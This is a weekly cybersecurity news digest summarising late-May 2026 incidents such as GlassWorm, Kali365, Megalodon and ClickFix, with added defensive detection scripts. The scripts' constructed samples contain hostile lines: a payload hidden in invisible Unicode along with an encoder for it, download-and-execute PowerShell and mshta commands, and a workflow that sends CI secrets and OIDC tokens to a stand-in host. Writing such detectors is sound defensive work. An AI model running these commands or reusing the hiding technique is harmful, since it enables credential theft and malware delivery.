
Cybersecurity News Digester

June 1, 2026

Weekly Review, 2026-06-01


Covers 7 daily digests (2026-05-26 to 2026-06-01).

All summaries, analysis, and story clustering are done by an LLM. It may make mistakes and say incorrect things. Check the sources and support the actual journalists.

Top Stories

1. GlassWorm botnet targeted the open-source software ecosystem via trojanized Visual Studio Code extensions

4 outlets, 2026-05-27 to 2026-05-28 - severity 4/5

CrowdStrike, Google, and the Shadowserver Foundation ran a coordinated operation to dismantle the GlassWorm botnet by taking down its four command-and-control (C2) channels at once: the Solana blockchain, Google Calendar, the BitTorrent peer-to-peer network, and conventional VPS-hosted servers. Operating since at least early 2025, GlassWorm targeted the open-source software ecosystem by distributing trojanized Visual Studio Code extensions through the OpenVSX marketplace. The attack chain used Unicode variation selectors to embed code that renders as nothing in a code editor, so trojanized source passed casual review; the payload stole NPM, GitHub, and Git credentials as well as cryptocurrency funds. The campaign touched hundreds of software artifacts, including more than 300 GitHub repositories and numerous Python projects, and deployed SOCKS proxies and hidden VNC servers for remote access to infected machines. Researchers attributed the operation to a Russian-speaking actor based on Russian-language comments in the code and the malware's avoidance of CIS countries. The takedown has cut the botnet off from its C2 services, but the credentials already stolen remain an ongoing supply chain risk: any token that was present on an infected developer machine before the takedown should be treated as compromised and rotated.
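The variation-selector trick is easy to check for, because legitimate source text almost never contains more than one or two such code points in a row. The scanner below is an added example written for this digest; it is not code from the GlassWorm research or from any of the vendors named above. It assumes the publicly documented "invisible text" mapping (bytes 0..15 to U+FE00..U+FE0F, bytes 16..255 to U+E0100..U+E01EF) as one way such a payload could be encoded; that mapping, the sample extension file and the payload it hides are all constructed here, not taken from GlassWorm.

```python
"""Find payloads hidden in runs of Unicode variation selectors.

Added example for this digest; not code from the GlassWorm research or any
vendor. The byte-to-variation-selector mapping below is an assumption about
how such a payload could be encoded (the publicly documented "invisible
text" scheme), not a claim about GlassWorm's exact encoding.
"""
import re

VS_BASIC = 0xFE00      # U+FE00..U+FE0F  carry byte values 0..15
VS_SUPP = 0xE0100      # U+E0100..U+E01EF carry byte values 16..255

# A run of variation selectors. Legitimate text uses at most one or two
# (e.g. U+FE0F after an emoji), so a long run is the anomaly to flag.
_VS_RUN = re.compile(r"[\uFE00-\uFE0F\U000E0100-\U000E01EF]+")


def byte_to_vs(b: int) -> str:
    """Map one byte to its variation selector (assumed encoding)."""
    return chr(VS_BASIC + b) if b < 16 else chr(VS_SUPP + (b - 16))


def vs_to_byte(ch: str) -> int:
    """Inverse of byte_to_vs."""
    cp = ord(ch)
    if VS_BASIC <= cp <= VS_BASIC + 15:
        return cp - VS_BASIC
    return cp - VS_SUPP + 16


def hide(payload: bytes) -> str:
    """Encode a payload as an invisible string (used here to build test input)."""
    return "".join(byte_to_vs(b) for b in payload)


def find_hidden(source: str, min_run: int = 8) -> list[dict]:
    """Report every variation-selector run of at least min_run code points.

    Each finding carries the 1-based line, the column where the run starts,
    its length, and the bytes it decodes to under the assumed mapping.
    """
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for match in _VS_RUN.finditer(line):
            run = match.group(0)
            if len(run) < min_run:
                continue                      # lone VS16 after an emoji etc.
            raw = bytes(vs_to_byte(c) for c in run)
            findings.append({
                "line": line_no,
                "col": match.start(),
                "length": len(run),
                "decoded": raw.decode("utf-8", errors="replace"),
            })
    return findings


# Constructed sample: an extension file whose second line looks like a plain
# comment in an editor but carries an invisible payload after the "ok".
HIDDEN_PAYLOAD = b"fetch('https://c2.example/x')"
SAMPLE_EXTENSION_JS = (
    "const a = 1;\n"
    "// ok" + hide(HIDDEN_PAYLOAD) + "\n"
    "const s = '\u2714\uFE0F';   // a real emoji plus VS16: not flagged\n"
    "export {};\n"
)

if __name__ == "__main__":
    for f in find_hidden(SAMPLE_EXTENSION_JS):
        print(f"line {f['line']} col {f['col']}: {f['length']} hidden code points -> {f['decoded']!r}")
```

Run it over a checkout of an extension or package before installing; the min_run threshold keeps emoji presentation sequences from showing up as noise, and the decoded bytes tell you immediately whether the run is an encoded payload or something benign.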

Sources

  • GlassWorm Botnet Disrupted - SecurityWeek, 2026-05-27 (quality: 20/21)
  • CrowdStrike disrupts Glassworm botnet that preyed on open-source supply chain - CyberScoop, 2026-05-27 (quality: 20/21)
  • Glassworm botnet disrupted after resilient C2 infrastructure takedown - BleepingComputer, 2026-05-27 (quality: 20/21)
  • Coordinated operation takes down Glassworm botnet - Cybersecurity Dive - Latest News, 2026-05-27 (quality: 9/21)

2. Kali365 PhaaS platform targets Microsoft 365 accounts using the OAuth device code flow

5 outlets, 2026-05-26 to 2026-05-29 - severity 4/5

The Kali365 phishing-as-a-service (PhaaS) platform targets Microsoft 365 accounts by abusing the OAuth 2.0 device authorization grant (the "device code flow") alongside adversary-in-the-middle (AitM) techniques to bypass multi-factor authentication (MFA). The lure is a phishing email disguised as a legitimate notification, such as a Teams invite, that asks the victim to enter a short code on Microsoft's genuine device-login page. Because the attacker's client started that flow, Microsoft issues the OAuth access and refresh tokens to the attacker once the victim completes sign-in, MFA included; no password is captured because none is needed. The tokens grant access to mailboxes, OneDrive, SharePoint, and other single-sign-on applications such as Salesforce for as long as the refresh token stays valid. The service runs on a subscription model with admins, resellers, and affiliates, and has been observed targeting organizations across North America and Europe since April 2026. The FBI and the Internet Crime Complaint Center (IC3) have issued advisories; researchers recommend Conditional Access policies that block or restrict the device code authentication flow for users with no business need for it, and revoking refresh tokens for any account that completed an unexpected device-code sign-in.
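The detection angle follows from the protocol: the sign-in record for a device-code flow carries the IP address of the client that polled the token endpoint, which is the phishing kit's host rather than the victim's machine. The script below is an added example written for this digest, not tooling from the FBI advisory or any vendor. Its records are constructed and shaped like Microsoft Entra ID sign-in log entries (userPrincipalName, ipAddress, appDisplayName, authenticationProtocol, createdDateTime, status.errorCode); the trusted network ranges and the per-IP threshold are assumptions.

```python
"""Flag OAuth device-code sign-ins of the kind Kali365-style phishing produces.

Added example for this digest, not from the FBI advisory or any vendor.
Sign-in records are constructed and follow Entra ID sign-in log field names.
TRUSTED_NETS and min_users_per_ip are assumptions to adapt to your tenant.
"""
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Assumed corporate egress range (RFC 5737 documentation addresses).
TRUSTED_NETS = [ip_network("203.0.113.0/24")]

# Constructed sign-in records; 192.0.2.45 plays the phishing kit's host.
SAMPLE_SIGNINS = [
    {"userPrincipalName": "alice@example.com", "ipAddress": "203.0.113.17",
     "appDisplayName": "Microsoft Teams", "authenticationProtocol": "none",
     "createdDateTime": "2026-05-27T08:02:11Z", "status": {"errorCode": 0}},
    {"userPrincipalName": "bob@example.com", "ipAddress": "192.0.2.45",
     "appDisplayName": "Microsoft Office", "authenticationProtocol": "deviceCode",
     "createdDateTime": "2026-05-27T08:15:40Z", "status": {"errorCode": 0}},
    {"userPrincipalName": "carol@example.com", "ipAddress": "192.0.2.45",
     "appDisplayName": "Microsoft Office", "authenticationProtocol": "deviceCode",
     "createdDateTime": "2026-05-27T08:19:03Z", "status": {"errorCode": 0}},
    {"userPrincipalName": "dave@example.com", "ipAddress": "203.0.113.80",
     "appDisplayName": "Azure CLI", "authenticationProtocol": "deviceCode",
     "createdDateTime": "2026-05-27T09:00:00Z", "status": {"errorCode": 0}},
    {"userPrincipalName": "erin@example.com", "ipAddress": "192.0.2.45",
     "appDisplayName": "Microsoft Office", "authenticationProtocol": "deviceCode",
     "createdDateTime": "2026-05-27T08:30:00Z", "status": {"errorCode": 50126}},
]


def is_trusted(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in TRUSTED_NETS)


def device_code_alerts(signins, min_users_per_ip: int = 2):
    """Return (per-sign-in alerts, IPs that completed device-code sign-ins for several users)."""
    alerts = []
    users_by_ip = defaultdict(set)
    for s in signins:
        if s.get("authenticationProtocol") != "deviceCode":
            continue
        if s["status"]["errorCode"] != 0:
            continue          # a failed attempt never yielded a token
        users_by_ip[s["ipAddress"]].add(s["userPrincipalName"])
        if not is_trusted(s["ipAddress"]):
            alerts.append({
                "user": s["userPrincipalName"],
                "ip": s["ipAddress"],
                "app": s["appDisplayName"],
                "time": s["createdDateTime"],
                "action": "revoke refresh tokens and re-verify the user",
            })
    # One untrusted host finishing device-code flows for many accounts is the
    # kit's signature; a single developer using the Azure CLI looks different.
    shared_ips = {ip: sorted(users) for ip, users in users_by_ip.items()
                  if len(users) >= min_users_per_ip}
    return alerts, shared_ips


if __name__ == "__main__":
    alerts, shared = device_code_alerts(SAMPLE_SIGNINS)
    for a in alerts:
        print(f"{a['time']} {a['user']} device-code sign-in from untrusted {a['ip']} via {a['app']}")
    for ip, users in shared.items():
        print(f"{ip} completed device-code sign-ins for {len(users)} users: {', '.join(users)}")
```

The preventive control is the Conditional Access "Authentication flows" condition: a policy that selects the device code flow and grants Block, scoped to everyone except the few identities (CLI tooling, headless devices) that legitimately use it. Detection like the above still matters for the excluded accounts and for the window before the policy is in place.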

Sources

  • FBI warns of Kali365 phishing service targeting Microsoft 365 accounts - BleepingComputer, 2026-05-25 (quality: 20/21)
  • FBI warns of Kali365 phishing kit that breaks into Microsoft 365 accounts – no password required - GRAHAM CLULEY, 2026-05-26 (quality: 17/21)
  • FBI warns about PhaaS platform used to access Microsoft 365 environments - Cybersecurity Dive - Latest News, 2026-05-26 (quality: 10/21)
  • Kali365 phishing kit bypasses MFA and steals Microsoft logins - Malwarebytes, 2026-05-27 (quality: 14/21)
  • ThreatsDay Bulletin: Claude Security Plugin, Azure Priv-Esc, Kali365 MFA Bypass, FIFA Scams +15 More - The Hacker News, 2026-05-28 (quality: 9/21)

3. TeamPCP uses Shai-Hulud worm to poison npm packages and developer components

2 outlets, 2026-05-26 to 2026-06-01 - severity 5/5

The threat actor TeamPCP has run multiple supply chain campaigns, including the Shai-Hulud self-replicating worm that poisons npm packages and infects downstream developer components. The attack chain harvested OIDC credentials during the TanStack wave and used compromised maintainer accounts to push malicious updates, among them the @antv npm ecosystem breach and the trojanization of a Microsoft-published Python SDK. The intrusion extended to the Visual Studio Marketplace through a malicious Nx Console extension, with downstream victims including OpenAI, Grafana Labs, and Mistral AI. Technically, the group abused SLSA provenance attestation to help the worm replicate, and has used malware such as GlassWorm for ransomware and data theft. After compromising GitHub's internal codebase, the group published the Shai-Hulud source code, which researchers suggest is meant to scale the attack through a new affiliate program.

Sources

  • TeamPCP Supply Chain Campaign: Activity Through 2026-05-24, (Mon, May 25th) - SANS Internet Storm Center, InfoCON: green, 2026-05-25 (quality: 20/21)
  • The Hackers Behind Shai-Hulud: Lucky or Skilled? - darkreading, 2026-05-26 (quality: 19/21)

4. Silent Ransom Group targets U.S. law firms through social engineering campaigns

5 outlets, 2026-05-27 to 2026-05-28 - severity 3/5

The Silent Ransom Group, also tracked as Luna Moth, Chatty Spider, and UNC3753, targets U.S.-based law firms and financial organizations through social engineering and, when that fails, physical access. The group emerged in 2022 after the Conti ransomware syndicate disbanded and uses phishing emails and fraudulent IT support calls to talk victims into opening remote desktop sessions. When remote access fails, operatives visit victim sites in person and plug USB drives or external hard drives into workstations under the pretext of performing backups or device imaging. Stolen data is exfiltrated with tools such as WinSCP and Rclone or by uploading it to cloud services like Google Drive and Microsoft OneDrive, and the group then extorts the victim under threat of publication rather than by encrypting systems. The FBI has issued multiple warnings about these campaigns, which have driven an uptick in attacks on the legal sector. As of early 2026 the group has claimed more than 100 attacks, part of a broader trend in which the legal sector accounted for more than 6% of all tracked ransomware incidents in the first quarter of the year. Removable-media device control, alerting on WinSCP and Rclone execution on endpoints with no business running them, and a verification step for anyone who shows up claiming to be IT are the controls this tradecraft calls for.

Sources

  • FBI warns of in-person data theft attacks from extortion gang - BleepingComputer, 2026-05-27 (quality: 19/21)
  • FBI: Hackers Sending Operatives in Person to Insert USB Drives and Steal Data - SecurityWeek, 2026-05-27 (quality: 19/21)
  • FBI warns US-based law firms to be on the lookout for cybercrime group that steals data in person - CyberScoop, 2026-05-27 (quality: 20/21)
  • FBI warns extortion hackers are visiting US law firms to steal data - The Record from Recorded Future News, 2026-05-27 (quality: 19/21)
  • Ransomware Actors Show Up In Person to Steal Law Firm Data - darkreading, 2026-05-27 (quality: 11/21)

5. Credential-stuffing attack using MyHeritage breach data targeted 23andMe customer accounts

2 outlets, 2026-05-29 to 2026-05-30 - severity 4/5

A credential-stuffing attack against 23andMe (now Chrome Holding Co.) reused credentials stolen in the 2017 MyHeritage breach to log directly into a relatively small number of customer accounts and, from those, expose data belonging to approximately 7 million customers. The exposed data included raw genetic data, health reports, ancestry details, and the identities and locations of biological relatives. Two control failures enabled it: MFA was not enforced, and a coding error in the "DNA Relatives" feature allowed unauthorized access to data from accounts that were not even using that service. 23andMe reached a $50 million settlement in 2024 to resolve U.S. customer claims and subsequently filed for bankruptcy. The California Attorney General has now sued Chrome Holding Co., alleging violations of several state privacy and consumer protection laws and seeking statutory penalties.

Sources

  • California Sues 23andMe, Alleging It Failed to Protect User Data in 2023 Breach - SecurityWeek, 2026-05-29 (quality: 19/21)
  • California AG sues 23andMe over 2023 breach exposing health data - BleepingComputer, 2026-05-29 (quality: 17/21)

6. Nightmare Eclipse publicly discloses multiple Windows zero-days with working proof-of-concept code

2 outlets, 2026-05-29 to 2026-05-30 - severity 4/5

An actor using the handle Nightmare Eclipse has publicly disclosed multiple Windows zero-day vulnerabilities, dubbed BlueHammer, UnDefend, RedSun, YellowKey, GreenPlasma, and MiniPlasma, without coordinating with Microsoft. Beginning in April 2026, the actor published the vulnerabilities together with working proof-of-concept code on GitHub, and BlueHammer, UnDefend, and RedSun have since been confirmed exploited in live intrusions. GitHub has removed the Nightmare Eclipse account and the actor's Blogger page has gone offline. Microsoft called the uncoordinated releases unjustifiable and said its Digital Crimes Unit may pursue legal action against those who enable criminal activity. As of late May 2026 the actor is threatening a further batch of disclosures timed to Microsoft's next Patch Tuesday.

Sources

  • Microsoft Slams Public Zero-Day Disclosures Amid GitHub Researcher Account Removal - The Hacker News, 2026-05-28 (quality: 10/21)
  • Microsoft calls zero-day releases ‘never justifiable’ as researcher threatens to drop more - The Record from Recorded Future News, 2026-05-29 (quality: 20/21)

7. Ababil of Minab breached LACMTA, exfiltrating data and destroying systems

3 outlets, 2026-05-27 to 2026-05-28 - severity 4/5

The Iranian-linked threat actor Ababil of Minab breached the Los Angeles County Metropolitan Transportation Authority (LACMTA) in March 2026, causing significant internal operational disruption. The attackers reached core virtualization management platforms, Microsoft IIS web servers, and operational technology systems used for train monitoring, exfiltrated more than 1 TB of data, and wiped hundreds of terabytes of server contents. Forensic analysis by Gambit Security tied the group's infrastructure and custom exfiltration tools to Iran's Ministry of Intelligence (MOIS) and to the group Black Shadow. Databases, virtual machines, and backup infrastructure were destroyed through a mix of hands-on-keyboard activity and automated scripts intended to prevent recovery; that the backups were reachable from the compromised environment is the detail defenders should take from this case, since only offline or immutable copies survive an attacker with this level of access. Beyond LA Metro, the group has targeted organizations in Israel, Turkey, and Saudi Arabia, including media outlets, universities, and insurance brokerages.

Sources

  • Iranian government, not hacktivist group, breached LA Metro system, security firm says - Cybersecurity Dive - Latest News, 2026-05-26 (quality: 10/21)
  • Iranian intelligence service behind hack of LA transit system, researchers say - The Record from Recorded Future News, 2026-05-27 (quality: 19/21)
  • LA Metro Cyberattack Linked to Iranian State-Sponsored Hackers - SecurityWeek, 2026-05-27 (quality: 20/21)

8. Attackers exploit Ghost CMS vulnerability to target universities and DuckDuckGo

2 outlets, 2026-05-26 - severity 4/5

Attackers exploited a critical SQL injection vulnerability (CVE-2026-26980) in Ghost CMS versions 3.24.0 through 6.19.0 to compromise more than 700 websites, among them sites belonging to Harvard University, Oxford University, and DuckDuckGo. The flaw let them read Admin API keys, with which they injected malicious JavaScript into posts and pages to run ClickFix campaigns: visitors see a fake Cloudflare or CAPTCHA verification prompt that instructs them to paste a command into the Windows Run dialog or a PowerShell window, and that command fetches and executes malware. At least two threat groups have been observed running these poisoning operations, at times competing to implant their own code on the same compromised sites. Operators of affected Ghost versions should upgrade, rotate their Admin API (integration) keys, and audit posts and the site's code injection settings for content they did not add.
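On the endpoint, ClickFix leaves a recognizable lineage: the pasted command runs as an interpreter spawned by explorer.exe (the Run dialog's parent) with a command line that downloads and evaluates remote content, often with the lure's "I am not a robot" text trailing as a shell comment. The scorer below is an added example written for this digest, not detection logic from the Ghost CMS or Malwarebytes write-ups. Its events are constructed with Sysmon-like field names (ParentImage, Image, CommandLine), and the indicator list, weights and threshold are assumptions to tune against your own telemetry.

```python
"""Score process-creation events for ClickFix-style execution.

Added example for this digest, not from any of the cited reports. Events are
constructed; indicator weights and ALERT_THRESHOLD are assumptions.
"""
import base64
import re
from pathlib import PureWindowsPath

LAUNCHERS = {"explorer.exe"}            # Win+R / Run dialog and desktop shell
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}
ALERT_THRESHOLD = 2

# (name, pattern, weight); applied to the command line plus any decoded -enc payload
INDICATORS = [
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    ("encoded-command", re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.I), 1),
    ("remote-fetch", re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|curl|certutil)\b", re.I), 1),
    ("eval", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 1),
    ("mshta-url", re.compile(r"\bmshta(?:\.exe)?\s+[\"']?https?://", re.I), 2),
    ("captcha-lure", re.compile(r"#.*(?:not a robot|captcha|verif)", re.I), 2),
]
_ENC_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE text behind a PowerShell -EncodedCommand argument, or ''."""
    m = _ENC_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(event: dict):
    """Return a finding dict for a suspicious event, else None."""
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    image = PureWindowsPath(event["Image"]).name.lower()
    if parent not in LAUNCHERS or image not in INTERPRETERS:
        return None
    decoded = decode_encoded_command(event["CommandLine"])
    text = event["CommandLine"] + "\n" + decoded      # inspect the decoded payload too
    hits = [(name, weight) for name, pat, weight in INDICATORS if pat.search(text)]
    score = sum(w for _, w in hits)
    if score < ALERT_THRESHOLD:
        return None
    return {"score": score, "indicators": [n for n, _ in hits], "decoded": decoded}


def detect_clickfix(events) -> list[dict]:
    found = []
    for i, ev in enumerate(events):
        r = score_event(ev)
        if r:
            found.append({"index": i, **r})
    return found


def _enc(ps: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_EVENTS = [  # constructed
    {"ParentImage": EXPLORER, "Image": PS,
     "CommandLine": 'powershell -w hidden -c "irm https://verify.example/ok.txt | iex" # I am not a robot - reCAPTCHA Verification ID: 7421'},
    {"ParentImage": EXPLORER, "Image": PS,
     "CommandLine": "powershell -NoProfile -Command Get-Date"},
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe", "Image": PS,
     "CommandLine": 'powershell -NoProfile -Command "irm https://registry.example/x | iex"'},
    {"ParentImage": EXPLORER, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c mshta https://cf.example/v"},
    {"ParentImage": EXPLORER, "Image": PS,
     "CommandLine": "powershell -nop -w hidden -enc " + _enc("iwr https://a.example/p | iex")},
]

if __name__ == "__main__":
    for f in detect_clickfix(SAMPLE_EVENTS):
        print(f"event {f['index']}: score {f['score']} {f['indicators']}")
```

The third sample (an editor spawning PowerShell with the same download-and-run text) is deliberately not flagged: parent lineage is what separates a pasted Run-dialog command from a developer's build step, and any rule that ignores it will drown in noise. Decoding -EncodedCommand before scoring matters because the kits increasingly hide the fetch behind base64.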

Sources

  • 700+ education and tech websites hijacked in huge ClickFix malware campaign - Malwarebytes, 2026-05-26 (quality: 12/21)
  • Ghost CMS Vulnerability Exploited to Hack Over 700 Websites - SecurityWeek, 2026-05-25 (quality: 18/21)

Under the Radar

High-severity stories that received limited coverage this period.

Megalodon malware campaign injected malicious GitHub Actions workflows into GitHub repositories

1 outlet, 2026-05-27 - severity 4/5

The Megalodon campaign was an automated attack that injected malicious GitHub Actions workflows into 5,561 GitHub repositories through 5,718 malicious commits. The payload had two parts: a "SysDiag" YAML file that created new workflows, and a second stage that replaced existing workflows with versions carrying a workflow_dispatch trigger, giving the attacker a persistent, manually triggerable backdoor. The workflows exfiltrated CI/CD secrets, cloud credentials, SSH keys, OpenID Connect tokens, and source code to a command-and-control server. Researchers noted surface-level similarities to the TeamPCP Shai-Hulud worm, but no direct attribution has been confirmed. A week after the initial six-hour attack window, roughly 2,900 repositories remained infected.
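The combination the story describes (a workflow_dispatch trigger, steps that reference secrets or the OIDC token request variables, and an outbound request to a host nobody recognizes) is cheap to audit across an organization's repositories. The script below is an added example written for this digest; it is neither the researchers' detection logic nor the real Megalodon payload. It parses workflows with regular expressions so it runs without a YAML library, the two workflow files are constructed to illustrate the pattern, and the allowlist of legitimate hosts is an assumption.

```python
"""Audit GitHub Actions workflow files for Megalodon-style secret exfiltration.

Added example for this digest, not the real Megalodon payload or anyone's
production detector. Both workflows are constructed; ALLOWED_HOST_SUFFIXES
is an assumption about which hosts a CI job may legitimately contact.
"""
import re

ALLOWED_HOST_SUFFIXES = ("github.com", "githubusercontent.com", "npmjs.org", "pypi.org")

_STEP_START = re.compile(r"^\s*-\s+(?:name|run|uses):", re.M)
_STEP_NAME = re.compile(r"-\s+name:\s*(.+)")
_SECRET_REF = re.compile(
    r"toJSON\(\s*secrets\s*\)|secrets\.\w+|GITHUB_TOKEN|ACTIONS_ID_TOKEN_REQUEST_TOKEN|ACTIONS_RUNTIME_TOKEN")
_FETCH_URL = re.compile(r"\b(?:curl|wget)\b[^\n]*?https?://([A-Za-z0-9.-]+)")
_DISPATCH = re.compile(r"^\s+workflow_dispatch\s*:", re.M)
_OIDC_WRITE = re.compile(r"^\s*id-token\s*:\s*write", re.M)


def host_allowed(host: str) -> bool:
    return any(host == s or host.endswith("." + s) for s in ALLOWED_HOST_SUFFIXES)


def split_steps(text: str) -> list[str]:
    """Crude split of the workflow into step blocks at each '- name/run/uses:' line."""
    starts = [m.start() for m in _STEP_START.finditer(text)]
    return [text[a:b] for a, b in zip(starts, starts[1:] + [len(text)])]


def audit_workflow(text: str) -> dict:
    """Flag steps that touch secrets/tokens and call out to non-allowlisted hosts."""
    exfil_steps = []
    for step in split_steps(text):
        hosts = sorted({h for h in _FETCH_URL.findall(step) if not host_allowed(h)})
        if hosts and _SECRET_REF.search(step):
            name = _STEP_NAME.search(step)
            label = name.group(1).strip() if name else step.strip().splitlines()[0]
            exfil_steps.append({"step": label, "hosts": hosts})
    return {
        "workflow_dispatch": bool(_DISPATCH.search(text)),   # manually fireable backdoor
        "oidc_write": bool(_OIDC_WRITE.search(text)),        # job can mint OIDC tokens
        "exfil_steps": exfil_steps,
    }


BENIGN_WORKFLOW = """\
name: publish
on:
  push:
    branches: [main]
permissions:
  contents: read
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Publish package
        run: npm publish
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
"""

# Constructed to match the described pattern; not the real Megalodon file.
SUSPECT_WORKFLOW = """\
name: SysDiag
on:
  workflow_dispatch:
  push:
permissions:
  id-token: write
  contents: read
jobs:
  diag:
    runs-on: ubuntu-latest
    steps:
      - name: Collect diagnostics
        run: |
          printf '%s' '${{ toJSON(secrets) }}' > /tmp/d.json
          curl -s -X POST --data-binary @/tmp/d.json https://diag.example.net/upload
      - name: Token
        run: curl -s -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL" | curl -s -X POST -d @- https://diag.example.net/oidc
"""

if __name__ == "__main__":
    for label, wf in (("benign", BENIGN_WORKFLOW), ("suspect", SUSPECT_WORKFLOW)):
        print(label, audit_workflow(wf))
```

A workflow_dispatch trigger on its own is common and harmless; the finding worth paging on is a workflow that gained one in the same commit that added a step shipping toJSON(secrets) or the OIDC request token somewhere new. Where a repository was hit, rotating every secret the workflow could read, and the cloud roles those OIDC tokens could assume, matters more than cleaning the YAML.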

Why it matters: Confirmed widespread exploitation of thousands of repositories to exfiltrate critical CI/CD secrets, cloud credentials, and source code.

Sources

  • Feeding Frenzy: 'Megalodon' Malware Infects Thousands of GitHub Repos - darkreading, 2026-05-26 (quality: 20/21)

Russia uses cyberattacks against European firms to bypass international sanctions

1 outlet, 2026-05-31 - severity 4/5

Russia is utilizing a network of front companies, intermediaries, and cyber operations to bypass international sanctions and procure advanced Western technologies, including machine tools, dual-use software, and components for military systems like the Gripen fighter jet. Intelligence agencies from Sweden, Finland, the UK, and Estonia have identified these procurement efforts targeting high-end research in space, quantum, and marine technology. The operation includes cyberattacks against European firms and critical infrastructure to gather intelligence and facilitate the acquisition of civilian-use camera and laser technology for weapons integration. Recent enforcement actions include the arrest of two individuals in Sweden for violating sanctions via a Turkish company, while Russian-linked intrusions have also targeted European power plants.

Why it matters: Confirmed widespread use of cyber operations and shell companies to bypass sanctions and procure dual-use technology for Russian military use.

Sources

  • Russian Spies Are Aggressively Seeking Western Technology as Sanctions Bite, Officials Say - SecurityWeek, 2026-05-30 (quality: 20/21)

Unknown threat actor exploited Marimo notebooks vulnerability to exfiltrate PostgreSQL database

1 outlet, 2026-05-30 - severity 4/5

An unknown threat actor exploited CVE-2026-39987, a critical unauthenticated (pre-auth) remote code execution vulnerability in Marimo notebooks, to compromise an internet-reachable instance and retrieve the cloud credentials available to it. Driving post-exploitation with an LLM agent, the attacker pulled an SSH private key from AWS Secrets Manager and used it to reach a downstream SSH bastion host. The whole chain took roughly an hour and ended with the exfiltration of the schema and full contents of an internal PostgreSQL database. Evidence of the agent's involvement included machine-formatted command delimiters and a Chinese-language planning comment in the command stream. Two conditions made the chain possible: a notebook server exposed to the internet, and an instance role broad enough to read a bastion's private key from Secrets Manager; keeping notebook servers off the public internet and scoping that role would have broken the chain at either link.

Why it matters: Confirmed exploitation of a critical RCE vulnerability led to the successful exfiltration of an entire internal PostgreSQL database.

Sources

  • Attackers Use LLM Agent for Post-Exploitation After Marimo CVE-2026-39987 Exploit - The Hacker News, 2026-05-29 (quality: 20/21)

Nimbus Manticore targets aviation, software, and energy sectors with MiniFast malware

1 outlet, 2026-05-26 - severity 4/5

The Iranian state-sponsored threat actor Nimbus Manticore deployed MiniFast and MiniJunk V2 malware through phishing, fake meeting invitations, and SEO poisoning to target organizations in the aviation, software, and energy sectors across the U.S., Europe, and the Middle East. The attack chain involved AppDomain hijacking to deliver MiniJunk via ZIP archives and the distribution of a trojanized Oracle SQL Developer installer via a fraudulent download page. MiniFast functions as a backdoor capable of remote command execution, file operations, and privilege escalation, with features suggesting the use of artificial intelligence in its development. Beyond software-based espionage, the actor also exploited unprotected automatic tank gauge systems at U.S. gas stations to manipulate fuel display readings.

Why it matters: Confirmed widespread APT campaigns against critical sectors with new malware, plus documented espionage and tank-gauge tampering against U.S. targets.

Sources

  • Iranian Hackers Deploy MiniFast and MiniJunk V2 via Phishing and SEO Poisoning - The Hacker News, 2026-05-26 (quality: 20/21)

All Stories by Category

Vulnerabilities & Patches

  • OpenClaw Vulnerabilities Prompt Nvidia to Launch Secure NemoClaw Framework (2026-05-27, 1 outlet, severity 4/5)
    • For Enterprises, Security Remains Agentic AI's Biggest Challenge - darkreading
  • FortiClient EMS Flaw Exploited to Deploy Credential-Stealing Malware (2026-05-29, 1 outlet, severity 4/5)
    • Threat Actors Exploit Critical FortiClient EMS Flaw to Deploy Credential Stealer - The Hacker News
  • Kaspersky Finds Critical CVEs and Risks in Docker Hub Images (2026-05-29, 1 outlet, severity 3/5)
    • What’s in the container? Analyzing vulnerabilities, risks and protection with Kaspersky Container Security and the KIRA AI assistant - Securelist
  • Anthropic’s Mythos Model Uncovers 10,000 Critical Software Vulnerabilities (2026-05-27, 1 outlet, severity 3/5)
    • Anthropic: Mythos finds more than 10,000 software flaws in first month - CyberScoop
  • Use EPSS and EvidenceForge to Optimize Vulnerability Management Strategies (2026-05-29, 1 outlet, severity 3/5)
    • Less panic patching, more precision - Cisco Talos Blog
  • Conference Software Flaw Enables Guaranteed Talk Acceptance for Attackers (2026-05-28, 1 outlet, severity 3/5)
    • Vulnerability in Popular Conference Software Granted Attackers a 100% Talk Acceptance Rate - SecurityWeek
  • Orthanc Server Vulnerability Triggered via DICOM Heap Overflow Exploit (2026-05-28, 1 outlet, severity 2/5)
    • DICOM, Pydicom, GDCM, and Orthanc: A technical tour of what really happens in the heap - Cisco Talos Blog
  • Cox Media Group fined for false "Active Listening" claims (2026-05-27, 1 outlet, severity 2/5)
    • Company bragged phone mics could listen to conversations. They couldn’t. - Malwarebytes
  • search-for-compression.py Now Detects Compressed VBA in Microsoft Access (2026-05-26, 1 outlet, severity 2/5)
    • Microsoft Access VBA, (Mon, May 25th) - SANS Internet Storm Center, InfoCON: green
  • IBM and Red Hat Launch Project Lightwell to Fix Open-Source Vulnerabilities (2026-05-29, 2 outlets, severity 1/5)
    • IBM’s new $5B initiative will help enterprises rapidly patch open-source vulnerabilities - Cybersecurity Dive - Latest News
    • IBM and Red Hat Commit $5 Billion to Secure Open Source Supply Chains Under “Project Lightwell” - SecurityWeek

Data Breaches

